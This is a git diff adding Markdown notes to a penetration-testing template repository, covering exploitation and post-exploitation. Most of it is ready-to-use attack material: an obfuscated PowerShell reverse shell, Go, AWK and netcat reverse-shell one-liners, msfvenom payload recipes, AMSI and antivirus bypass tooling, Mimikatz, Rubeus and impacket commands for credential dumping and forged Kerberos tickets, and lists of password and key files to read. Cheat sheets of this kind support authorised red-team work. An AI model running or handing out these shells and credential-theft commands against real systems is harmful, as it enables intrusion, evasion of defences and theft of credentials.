+ +``` +# Offsec-callback-v2 +$ezYSZf = & ((Get-Command "New-ScheduledJobOption").name[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Check.for.Callback.Connection".Replace("Check",127).Replace("For",0+255-255).Replace("Callback", 0+234-234).Replace("Connection",0+0+0+1),(443*2-443)); +$VXm = $ezYSZf.GetStream(); +# checkin to target +[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0}; +while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0) +{; +$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i); +$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String ); +# AND +$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})); +$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT); +$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush() +}; +Start-Sleep -Seconds 5 +# checkout of target +$ezYSZf.Close() +``` + +Linux Powershell Oneliner: + +``` +$ezYSZf = & (("New-ScheduledJobOption")[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Stay.Off.Ronins.Lawn".Replace("Stay",127).Replace("Off",0+255-255).Replace("Ronins", 0+1-1).Replace("Lawn",0+0+0+1),(443*2-443)); +$VXm = $ezYSZf.GetStream(); +[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0}; +while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0) +{; +$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i); 
+$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String ); +$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})); +$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT); +$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush() +}; +$ezYSZf.Close() +``` + +Golang: + +- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go + +AWK: + +- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null + + +Other Reverse Shell: +https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + + +## Other Resources + +- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell + + + + + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md new file mode 100644 index 0000000..4c66979 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md 
@@ -0,0 +1,14 @@ +## Testing for Amsi Bypass: + +- https://github.com/rasta-mouse/AmsiScanBufferBypass + +## Amsi-Bypass-Powershell + +- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell + +## Resources: + +- https://blog.f-secure.com/hunting-for-amsi-bypasses/ +- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ +- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans +- https://slaeryan.github.io/posts/falcon-zero-alpha.html \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md new file mode 100644 index 0000000..465b6bc --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md 
@@ -0,0 +1,55 @@ +## Veil Framework: + +Install on Kali: +- apt install veil +- /usr/share/veil/config/setup.sh --force --silent + +Reference: https://github.com/Veil-Framework/Veil + +## Shellter + +Source: https://www.shellterproject.com/download/ + +- apt install shellter + + +## Sharpshooter + +Javascript Payload Stageless: +- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3 + +Stageless HTA Payload: + +- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee + +Staged VBS: + +- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4 + +Reference: https://github.com/mdsecactivebreach/SharpShooter + +## Donut: + +Source: https://github.com/TheWover/donut + +## Vulcan + +Source: https://github.com/praetorian-code/vulcan + + +## Scarecrow + +Source: https://github.com/optiv/ScareCrow + +In Kali: + +sudo apt install golang + +go get github.com/fatih/color +go get github.com/yeka/zip +go get github.com/josephspurrier/goversioninfo + +go build ScareCrow.go + +./ScareCrow + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md new file mode 100644 index 0000000..f758318 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md 
@@ -0,0 +1,86 @@ +## Creating a payload + +- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport] + +To view list of payloads: msfvenom -l payloads +To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options + +## Creating a payload with encoding + +- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile + +## Creating a payload using a template + +- msfvenom -p [payload] -x [template] -f [formattype] > outputfile + +## Listening for MSfvenom Payloads: + +``` +msf5>use exploit/multi/handler +msf5>set payload windows/meterpreter/reverse_tcp +msf5>set lhost +msf5>set lport +msf5> set ExitOnSession false +msf5>exploit -j +``` + +## Windows Payloads + +- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe +- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe +- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe +- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe +- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe + +## Linux Payloads + +- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf +- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf +- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf + +Add a user in windows with msfvenom: + +- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe + +## Web Payloads + +PHP + +- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php + +ASP + +- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 
asp > shell.asp + +JSP + +- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp + +WAR + +- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war + +## Scripting Payloads + +Python + +- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py + +Bash + +- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh + +Perl + +- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl + + +Creating an Msfvenom Payload with an encoder while removing bad charecters: + +- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D" + +## Resources: + +- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/ \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md new file mode 100644 index 0000000..93a442b --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md @@ -0,0 +1,28 @@ +## Fundamentals: + +Connect to a netcat client: +- rlwrap nc [IP Address] [port] + +Connect to a netcat Listener: + +- rlwrap nc -lvp [Localport] + +More info on rlwrap: https://linux.die.net/man/1/rlwrap + +## Backdoor Shells: + +Linux: + +- rlwrap nc [Your IP Address] -e /bin/sh +- rlwrap nc [Your IP Address] -e /bin/bash +- rlwrap nc [Your IP Address] -e /bin/zsh +- rlwrap nc [Your IP Address] -e /bin/ash + + +Windows: + +- rlwrap nc -lv [localport] -e cmd.exe + +Linux netcat reverse shell: + +- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md new file mode 100644 index 0000000..7dd2010 --- /dev/null 
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md @@ -0,0 +1,39 @@ +## Installing searchsploit (Already in Kali) + +- apt update && apt install exploitdb + +## Install binsploits +Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. + +- apt update && apt install exploitdb-bin-sploits + +## updating searchsploit + +- searchsploit -u + +## Basic Searching: + +- searchsploit etc +- searchsploit -t php windows + +## Exclude unwanted results +- searchsploit linux kernel 5.2 --exclude="Poc" + +## View exploits from Searchsploit +- searchsploit 9542 --examine +- searchsploit -x window/remote/42031.py + + +## Copy exploit to current working directory +- searchsploit -m + +## Access Exploits from Exploit-DB website: +- searchsploit vsftpd 2.3.4 -w + +## Run an nmap scan result through searchsploit: +1. Nmap -Pn 172.21.0.0 -oX results.xml +2. searchsploit -x --nmap results.xml + +Referneces: + +- https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md new file mode 100644 index 0000000..e69de29 diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md new file mode 100644 index 0000000..9a4c523 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md 
@@ -0,0 +1,45 @@
+## Spawn a tty:
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- /bin/bash -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+- PrivescCheck: https://github.com/itm4n/PrivescCheck
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources:
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack
+
+Windows:
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux:
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md
new file mode 100644
index 0000000..b4e7453
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md
@@ -0,0 +1,36 @@
+## Empire C2:
+
+Github: https://github.com/BC-SECURITY/Empire
+
+In Kali Linux:
+
+apt install powershell-empire
+
+Install Empire Manually:
+
+1. cd /Empire/setup
+2. ./install.sh
+
+- Current Listeners:
+
+(Empire) > listeners
+[!] No listeners currently active
+(Empire: listeners) > uselistener
+dbx http http_com http_foreign http_hop http_mapi meterpreter onedrive redirector
+
+
+## Covenant
+
+Source: https://github.com/cobbr/Covenant
+
+In Kali Repo:
+
+sudo apt install covenant-kbx
+
+Installing manually on Kali:
+
+1. apt install dotnet-sdk-2.2
+2. git clone --recurse-submodules https://github.com/cobbr/Covenant
+3. cd Covenant/Covenant
+4. dotnet build
+5. dotnet run
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..0ed9250
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md
@@ -0,0 +1,25 @@
+## Source:
+
+https://github.com/BloodHoundAD/BloodHound
+
+## Pre-Compiled Binaries
+
+https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound:
+
+https://github.com/BloodHoundAD/SharpHound3
+
+## Bloodhound for python
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
+
+## Install on Kali:
+
+apt install bloodhound
+
+## Gather Data
+
+- import-module .\sharphound.ps1
+- invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash -domain-sid -domain -spn
+- python3 ticketer.py -aesKey -domain-sid -domain -spn
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash -domain-sid -domain
+- python3 ticketer.py -aesKey -domain-sid -domain
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt
+
+## Generating a silver ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes256: /user:
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:/sid: /aes128: /user:
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:/sid: /rc4: /user:
+
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md new file mode 100644 index 0000000..0833644 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Rubeus.md @@ -0,0 +1,26 @@ +# Source + +- https://github.com/GhostPack/Rubeus + +Review the opsec notes before compiling the program in visual studio. + +## ASREProasting: + +chek for users in the current domain: + +- Rubeus.exe asreproast /format: /outfile: + +## Kerberoasting: + +- Rubeus.exe kerberoast /outfile: + +- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] + +## Pass the key (PTK): + +- .\Rubeus.exe asktgt /domain: /user: /rc4: /ptt + + +## Using the ticket on a Windows target: + +- Rubeus.exe ptt /ticket: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md new file mode 100644 index 0000000..0be96ad --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md @@ -0,0 +1 @@ +# This is a note placeholder to put your output that you recieved from a priv esc script that you executed on the target you obtained access too. \ No newline at end of file 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md new file mode 100644 index 0000000..7bd19b0 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md 
@@ -0,0 +1,78 @@ +## Finding Sensitive files on Linux: + +``` +locate password | more +/boot/grub/i386-pc/password.mod +/etc/pam.d/common-password +/etc/pam.d/gdm-password +/etc/pam.d/gdm-password.original +/lib/live/config/0031-root-password +``` +- cat /etc/profile +- cat /etc/passwd +- cat /etc/group +- cat /etc/shadow +- cat /etc/gshadow +- cat /var/apache2/config.inc +- cat /var/lib/mysql/mysql/user.MYD +- cat /root/anaconda-ks.cfg +- cat ~/.bash_history +- cat ~/.bash_profile +- cat ~/.bash_login +- cat ~/.nano_history +- cat ~/.atftp_history +- cat ~/.mysql_history +- cat ~/.php_history +- ls -alh /var/mail/ + +Sensitive Files for SSH: + +- find / -name authorized_keys 2> /dev/null +- find / -name id_rsa 2> /dev/null + + + +Log Files that could help: + +``` +cat /etc/httpd/logs/access_log +cat /etc/httpd/logs/access.log +cat /etc/httpd/logs/error_log +cat /etc/httpd/logs/error.log +cat /var/log/apache2/access_log +cat /var/log/apache2/access.log +cat /var/log/apache2/error_log +cat /var/log/apache2/error.log +cat /var/log/apache/access_log +cat /var/log/apache/access.log +cat /var/log/auth.log +cat /var/log/chttp.log +cat /var/log/cups/error_log +cat /var/log/dpkg.log +cat /var/log/faillog +cat /var/log/httpd/access_log +cat /var/log/httpd/access.log +cat /var/log/httpd/error_log +cat /var/log/httpd/error.log +cat /var/log/lastlog +cat /var/log/lighttpd/access.log +cat /var/log/lighttpd/error.log +cat /var/log/lighttpd/lighttpd.access.log +cat /var/log/lighttpd/lighttpd.error.log +cat /var/log/messages +cat /var/log/secure +cat /var/log/syslog +cat /var/log/wtmp +cat /var/log/xferlog +cat /var/log/yum.log +cat /var/run/utmp +cat /var/webmin/miniserv.log +cat /var/www/logs/access_log +cat /var/www/logs/access.log +ls -alh /var/lib/dhcp3/ +ls -alh /var/log/postgresql/ +ls -alh /var/log/proftpd/ +ls -alh /var/log/samba/ + +Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp +``` \ No 
newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md new file mode 100644 index 0000000..743737e --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Windows.md 
@@ -0,0 +1,59 @@ +# Sensitive Files to look for: + +## Windows: + +``` +%windir%\repair\sam +%windir%\System32\config\RegBack\SAM +%windir%\repair\system +%windir%\repair\software +%windir%\repair\security +%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) +%windir%\iis6.log (5,6 or 7) +%windir%\system32\logfiles\httperr\httperr1.log +C:\sysprep.inf +C:\sysprep\sysprep.inf +C:\sysprep\sysprep.xml +%windir%\Panther\Unattended.xml +C:\inetpub\wwwroot\Web.config +%windir%\system32\config\AppEvent.Evt (Application log) +%windir%\system32\config\SecEvent.Evt (Security log) +%windir%\system32\config\default.sav +%windir%\system32\config\security.sav +%windir%\system32\config\software.sav +%windir%\system32\config\system.sav +%windir%\system32\inetsrv\config\applicationHost.config +%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml +%windir%\System32\drivers\etc\hosts (dns entries) +%windir%\System32\drivers\etc\networks (network settings) +%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off) +%windir%\unattend.xml +%windir%\Windows\Panther\Unattend.xml +%windir%\Windows\Panther\Unattend\Unattend.xml +%windir%\Windows\system32\sysprep.inf +%windir%\Windows\system32\sysprep\sysprep.xml +C:\ProgramData\Configs\* +C:\Program Files\Windows PowerShell\* +dir c:*vnc.ini /s /b +dir c:*ultravnc.ini /s /b +``` + +## Search for contents contained in a file: + +``` +cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt +findstr /si password *.xml *.ini *.txt *.config +findstr /spin "password" *.* +``` + +## Search for a file with a certain filename: + +``` +dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* +where /R C:\ user.txt +where /R C:\ *.ini +``` + + + + 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md new file mode 100644 index 0000000..568f33e --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md @@ -0,0 +1,40 @@ +## Debian: + +- ls -alh /usr/bin/ +- ls -alh /sbin/ +- dpkg -l +- ls -alh /var/cache/apt/archivesO +- ls /usr/share/applications | awk -F '.desktop' ' { print $1}' - + +## RedHat: + +- rpm -qa +- ls -alh /var/cache/yum/ + + +## BSD: + +- pkg_info + +## Gentoo: + +- equery list +- eix -I + +## Arch Linux: + +- pacman -Q + + +## Bash Script: + +``` +#!/bin/bash +IFS=: read -ra dirs_in_path <<< "$PATH" + +for dir in "${dirs_in_path[@]}"; do + for file in "$dir"/*; do + [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}" + done +done +``` \ No newline at end of file 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md new file mode 100644 index 0000000..b432383 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Windows.md 
@@ -0,0 +1,40 @@ +# PowerShell + +``` +Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize +``` + +## Obtaining a list of programs from a remote system: + +- ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }``` + +## Here is a script that will pull a list of software that is installed on the users system: + +``` +$listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall + +$names = $listsoftware |foreach-object {Get-ItemProperty $_.PsPath} + +foreach ($name in $names) +{ + Write-Host $name.Displayname +} +``` + +## WMI: + +- ```Get-WmiObject -Class Win32_Product | Select-Object -Property Name > C:\InstalledSoftwareList.txt ``` + +## Reviewing Installed Windows Features + +- ```Get-WindowsFeature | Where-Object {$_.InstallState -eq 'Installed'}``` + +# Wmic + +## Note: Microsoft has planned to deprecrate this program in new versions of Windows. The commands used can be slow to run but it will return the results it needed: + +- wmic /output:C:\InstalledSoftwareList.txt product get name,version + +## Saving it to a text file: + +- wmic product get name,version /format:csv > C:\InstalledSoftware.csv \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md 
@@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md new file mode 100644 index 0000000..ee984e2 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Linux.md @@ -0,0 +1,38 @@ +## What does the targets network look like: + +- /sbin/ifconfig -a +- /sbin/ip addr +- cat /etc/network/interfaces +- cat /etc/sysconfig/network +- ip addr show + +## Network configuration Settings: + +- cat /etc/resolv.conf +- cat /etc/sysconfig/network +- cat /etc/networks +- iptables -L +- hostname +- 